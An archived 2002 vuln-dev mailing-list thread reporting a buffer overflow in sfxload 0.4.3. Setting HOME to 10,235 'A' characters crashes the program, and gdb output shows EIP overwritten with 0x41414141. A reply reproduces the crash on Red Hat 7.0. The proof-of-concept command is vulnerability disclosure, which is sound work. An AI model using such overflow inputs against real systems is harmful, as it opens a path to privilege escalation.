OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Gabriel A. Maggiotti (gmaggiotciudad.com.ar)
Date: Thu Jan 03 2002 - 14:53:30 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I successfully reproduced it in my box

    <qoute>
    [roottribilin /root]# cat /etc/issue

    Red Hat Linux release 7.0 (Guinness)
    Kernel 2.2.16-22 on an i586

    [roottribilin /root]# export HOME=`perl -e 'print "A" x 10235'`
    [roottribilin /root]# ./sfxload
    Segmentation fault (core dumped)
    </quote>

                                                                     Regards,
    Gabriel A. Maggiotti

    Email: gmaggiotciudad.com.ar
    Webpage: http://qb0x.net

    ----- Original Message -----
    From: "l0rt" <simonsnosoft.com>
    To: <vuln-devsecurityfocus.com>
    Sent: Wednesday, January 02, 2002 5:53 PM
    Subject: sfxload issues.

    >
    > Vendor : http://members.tripod.de/iwai/awedrv.html
    > Program: sfxload
    > OS : RH 7.1
    > Version: 0.4.3
    > SUID : No
    > SGID : No
    > Issue : This may get called by an suid helper binary which would allow
    > a normal user to gain some more privs.
    >
    > --------------------------------------------------------------------------
    >
    > Details:
    > [raven] /u1/cores/testing/bin> export HOME=`perl -e 'print "A" x 10235'`
    >
    > /* I just set HOME to be [10235] A's */
    >
    > [raven] /u1/cores/testing/bin> sfxload
    > Segmentation fault (core dumped)
    >
    > /* When xfsload is run it reads in the HOME var and cores!!! */
    >
    > [raven] /u1/cores/testing/bin/sfxload> gdb /bin/sfxload /* gdb */
    > GNU gdb 5.0rh-5 Red Hat Linux 7.1
    > Copyright 2001 Free Software Foundation, Inc.
    > GDB is free software, covered by the GNU General Public License, and you
    > are
    > welcome to change it and/or distribute copies of it under certain
    > conditions.
    > Type "show copying" to see the conditions.
    > There is absolutely no warranty for GDB. Type "show warranty" for
    > details.
    > This GDB was configured as "i386-redhat-linux"...(no debugging symbols
    > found)...
    > (gdb) core core
    > Core was generated by `AAAAAAAA'.
    > Program terminated with signal 11, Segmentation fault.
    > Reading symbols from /lib/i686/libm.so.6...done.
    > Loaded symbols for /lib/i686/libm.so.6
    > Reading symbols from /lib/i686/libc.so.6...done.
    > Loaded symbols for /lib/i686/libc.so.6
    > Reading symbols from /lib/ld-linux.so.2...done.
    > Loaded symbols for /lib/ld-linux.so.2
    > #0 0x41414141 in ?? ()
    > (gdb) bt
    > #0 0x41414141 in ?? ()
    > Cannot access memory at address 0x41414141
    > (gdb)
    >
    > /* EIP gets killed */
    >
    >
    >
    >
    > --
    > Regards,
    > l0rt
    >
    > ------------------------------------------------------------
    > "The only way to get rid of temptation is to give in to it."
    >
    >